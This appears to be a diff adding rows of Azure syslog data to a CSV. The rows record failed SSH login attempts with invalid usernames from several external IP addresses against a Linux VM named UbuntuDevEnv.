+292,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:34:24,UbuntuDevEnv,2019-06-26 17:34:23,auth,UbuntuDevEnv,info,Received disconnect from 74.94.246.82 port 57770:11: Bye Bye [preauth],51599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,57770,,
+293,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:34:26,UbuntuDevEnv,2019-06-26 17:34:25,auth,UbuntuDevEnv,info,Invalid user hang from 77.237.69.165 port 55506,51618,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hang,77.237.69.1,55506,,
+294,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:34:26,UbuntuDevEnv,2019-06-26 17:34:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,51618,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+295,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:34:26,UbuntuDevEnv,2019-06-26 17:34:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.237.69.165,51618,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.237.69.1,,0,
+296,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:34:28,UbuntuDevEnv,2019-06-26 17:34:28,auth,UbuntuDevEnv,info,Failed password for invalid user hang from 77.237.69.165 port 55506 ssh2,51618,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hang,77.237.69.1,55506,,
+297,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:34:28,UbuntuDevEnv,2019-06-26 17:34:28,auth,UbuntuDevEnv,info,Received disconnect from 77.237.69.165 port 55506:11: Bye Bye [preauth],51618,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.237.69.1,55506,,
+298,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:34:28,UbuntuDevEnv,2019-06-26 17:34:28,auth,UbuntuDevEnv,info,Disconnected from invalid user hang 77.237.69.165 port 55506 [preauth],51618,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hang,77.237.69.1,55506,,
+299,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:35:24,UbuntuDevEnv,2019-06-26 17:35:23,auth,UbuntuDevEnv,info,Invalid user ubuntu from 80.108.220.67 port 37868,51808,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,80.108.220.6,37868,,
+300,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:35:24,UbuntuDevEnv,2019-06-26 17:35:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=80.108.220.67,51808,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,80.108.220.6,,0,
+301,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:35:24,UbuntuDevEnv,2019-06-26 17:35:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,51808,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+302,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:35:25,UbuntuDevEnv,2019-06-26 17:35:25,auth,UbuntuDevEnv,info,Failed password for invalid user ubuntu from 80.108.220.67 port 37868 ssh2,51808,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,80.108.220.6,37868,,
+303,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:35:25,UbuntuDevEnv,2019-06-26 17:35:25,auth,UbuntuDevEnv,info,Disconnected from invalid user ubuntu 80.108.220.67 port 37868 [preauth],51808,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,80.108.220.6,37868,,
+304,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:35:25,UbuntuDevEnv,2019-06-26 17:35:25,auth,UbuntuDevEnv,info,Received disconnect from 80.108.220.67 port 37868:11: Bye Bye [preauth],51808,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,80.108.220.6,37868,,
+305,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:35:34,UbuntuDevEnv,2019-06-26 17:35:34,auth,UbuntuDevEnv,info,Invalid user hiver from 111.230.29.17 port 54038,51865,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hiver,111.230.29.1,54038,,
+306,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:35:34,UbuntuDevEnv,2019-06-26 17:35:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=111.230.29.17,51865,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,111.230.29.1,,0,
+307,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:35:34,UbuntuDevEnv,2019-06-26 17:35:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,51865,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+308,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:35:36,UbuntuDevEnv,2019-06-26 17:35:36,auth,UbuntuDevEnv,info,Failed password for invalid user hiver from 111.230.29.17 port 54038 ssh2,51865,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hiver,111.230.29.1,54038,,
+309,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:35:37,UbuntuDevEnv,2019-06-26 17:35:36,auth,UbuntuDevEnv,info,Received disconnect from 111.230.29.17 port 54038:11: Bye Bye [preauth],51865,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,111.230.29.1,54038,,
+310,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:35:37,UbuntuDevEnv,2019-06-26 17:35:36,auth,UbuntuDevEnv,info,Disconnected from invalid user hiver 111.230.29.17 port 54038 [preauth],51865,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hiver,111.230.29.1,54038,,
+311,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:35:49,UbuntuDevEnv,2019-06-26 17:35:49,auth,UbuntuDevEnv,info,Invalid user it from 77.237.69.165 port 34460,51918,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,it,77.237.69.1,34460,,
+312,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:35:49,UbuntuDevEnv,2019-06-26 17:35:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.237.69.165,51918,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.237.69.1,,0,
+313,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:35:49,UbuntuDevEnv,2019-06-26 17:35:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,51918,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+314,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:35:51,UbuntuDevEnv,2019-06-26 17:35:50,auth,UbuntuDevEnv,info,Failed password for invalid user it from 77.237.69.165 port 34460 ssh2,51918,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,it,77.237.69.1,34460,,
+315,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:35:51,UbuntuDevEnv,2019-06-26 17:35:50,auth,UbuntuDevEnv,info,Disconnected from invalid user it 77.237.69.165 port 34460 [preauth],51918,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,it,77.237.69.1,34460,,
+316,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:35:51,UbuntuDevEnv,2019-06-26 17:35:50,auth,UbuntuDevEnv,info,Received disconnect from 77.237.69.165 port 34460:11: Bye Bye [preauth],51918,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.237.69.1,34460,,
+317,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:35:51,UbuntuDevEnv,2019-06-26 17:35:51,auth,UbuntuDevEnv,info,Invalid user hill from 74.94.246.82 port 46724,51928,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hill,74.94.246.8,46724,,
+318,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:35:51,UbuntuDevEnv,2019-06-26 17:35:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,51928,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+319,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:35:51,UbuntuDevEnv,2019-06-26 17:35:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=74.94.246.82,51928,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,74.94.246.8,,0,
+320,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:35:53,UbuntuDevEnv,2019-06-26 17:35:52,auth,UbuntuDevEnv,info,Failed password for invalid user hill from 74.94.246.82 port 46724 ssh2,51928,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hill,74.94.246.8,46724,,
+321,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:35:53,UbuntuDevEnv,2019-06-26 17:35:52,auth,UbuntuDevEnv,info,Disconnected from invalid user hill 74.94.246.82 port 46724 [preauth],51928,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hill,74.94.246.8,46724,,
+322,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:35:53,UbuntuDevEnv,2019-06-26 17:35:52,auth,UbuntuDevEnv,info,Received disconnect from 74.94.246.82 port 46724:11: Bye Bye [preauth],51928,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,46724,,
+323,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:37:05,UbuntuDevEnv,2019-06-26 17:37:05,auth,UbuntuDevEnv,info,Invalid user sftpuser from 111.230.29.17 port 39184,52203,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sftpuser,111.230.29.1,39184,,
+324,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:37:05,UbuntuDevEnv,2019-06-26 17:37:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,52203,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+325,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:37:05,UbuntuDevEnv,2019-06-26 17:37:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=111.230.29.17,52203,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,111.230.29.1,,0,
+326,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:37:07,UbuntuDevEnv,2019-06-26 17:37:07,auth,UbuntuDevEnv,info,Failed password for invalid user sftpuser from 111.230.29.17 port 39184 ssh2,52203,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sftpuser,111.230.29.1,39184,,
+327,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:37:07,UbuntuDevEnv,2019-06-26 17:37:07,auth,UbuntuDevEnv,info,Received disconnect from 111.230.29.17 port 39184:11: Bye Bye [preauth],52203,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,111.230.29.1,39184,,
+328,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:37:07,UbuntuDevEnv,2019-06-26 17:37:07,auth,UbuntuDevEnv,info,Disconnected from invalid user sftpuser 111.230.29.17 port 39184 [preauth],52203,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sftpuser,111.230.29.1,39184,,
+329,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:37:15,UbuntuDevEnv,2019-06-26 17:37:15,auth,UbuntuDevEnv,info,Invalid user csgoserver from 77.237.69.165 port 41647,52247,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,csgoserver,77.237.69.1,41647,,
+330,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:37:15,UbuntuDevEnv,2019-06-26 17:37:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,52247,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+331,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:37:15,UbuntuDevEnv,2019-06-26 17:37:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.237.69.165,52247,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.237.69.1,,0,
+332,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:37:18,UbuntuDevEnv,2019-06-26 17:37:17,auth,UbuntuDevEnv,info,Failed password for invalid user csgoserver from 77.237.69.165 port 41647 ssh2,52247,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,csgoserver,77.237.69.1,41647,,
+333,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:37:18,UbuntuDevEnv,2019-06-26 17:37:17,auth,UbuntuDevEnv,info,Received disconnect from 77.237.69.165 port 41647:11: Bye Bye [preauth],52247,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.237.69.1,41647,,
+334,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:37:18,UbuntuDevEnv,2019-06-26 17:37:17,auth,UbuntuDevEnv,info,Disconnected from invalid user csgoserver 77.237.69.165 port 41647 [preauth],52247,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,csgoserver,77.237.69.1,41647,,
+335,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:37:21,UbuntuDevEnv,2019-06-26 17:37:20,auth,UbuntuDevEnv,info,Invalid user username from 74.94.246.82 port 35698,52264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,username,74.94.246.8,35698,,
+336,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:37:21,UbuntuDevEnv,2019-06-26 17:37:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=74.94.246.82,52264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,74.94.246.8,,0,
+337,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:37:21,UbuntuDevEnv,2019-06-26 17:37:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,52264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+338,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:37:23,UbuntuDevEnv,2019-06-26 17:37:22,auth,UbuntuDevEnv,info,Failed password for invalid user username from 74.94.246.82 port 35698 ssh2,52264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,username,74.94.246.8,35698,,
+339,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:37:23,UbuntuDevEnv,2019-06-26 17:37:22,auth,UbuntuDevEnv,info,Received disconnect from 74.94.246.82 port 35698:11: Bye Bye [preauth],52264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,35698,,
+340,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:37:23,UbuntuDevEnv,2019-06-26 17:37:22,auth,UbuntuDevEnv,info,Disconnected from invalid user username 74.94.246.82 port 35698 [preauth],52264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,username,74.94.246.8,35698,,
+341,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:38:31,UbuntuDevEnv,2019-06-26 17:38:31,auth,UbuntuDevEnv,info,Invalid user oracle5 from 54.37.66.73 port 45102,52520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle5,54.37.66.7,45102,,
+342,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:38:31,UbuntuDevEnv,2019-06-26 17:38:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,52520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+343,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:38:31,UbuntuDevEnv,2019-06-26 17:38:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,52520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+344,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:38:33,UbuntuDevEnv,2019-06-26 17:38:33,auth,UbuntuDevEnv,info,Failed password for invalid user oracle5 from 54.37.66.73 port 45102 ssh2,52520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle5,54.37.66.7,45102,,
+345,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:38:33,UbuntuDevEnv,2019-06-26 17:38:33,auth,UbuntuDevEnv,info,Disconnected from invalid user oracle5 54.37.66.73 port 45102 [preauth],52520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle5,54.37.66.7,45102,,
+346,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:38:33,UbuntuDevEnv,2019-06-26 17:38:33,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 45102:11: Bye Bye [preauth],52520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,45102,,
+347,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:38:38,UbuntuDevEnv,2019-06-26 17:38:37,auth,UbuntuDevEnv,info,Invalid user jack from 111.230.29.17 port 52562,52541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jack,111.230.29.1,52562,,
+348,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:38:38,UbuntuDevEnv,2019-06-26 17:38:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,52541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+349,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:38:38,UbuntuDevEnv,2019-06-26 17:38:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=111.230.29.17,52541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,111.230.29.1,,0,
+350,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:38:40,UbuntuDevEnv,2019-06-26 17:38:39,auth,UbuntuDevEnv,info,Failed password for invalid user jack from 111.230.29.17 port 52562 ssh2,52541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jack,111.230.29.1,52562,,
+351,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:38:40,UbuntuDevEnv,2019-06-26 17:38:40,auth,UbuntuDevEnv,info,Received disconnect from 111.230.29.17 port 52562:11: Bye Bye [preauth],52541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,111.230.29.1,52562,,
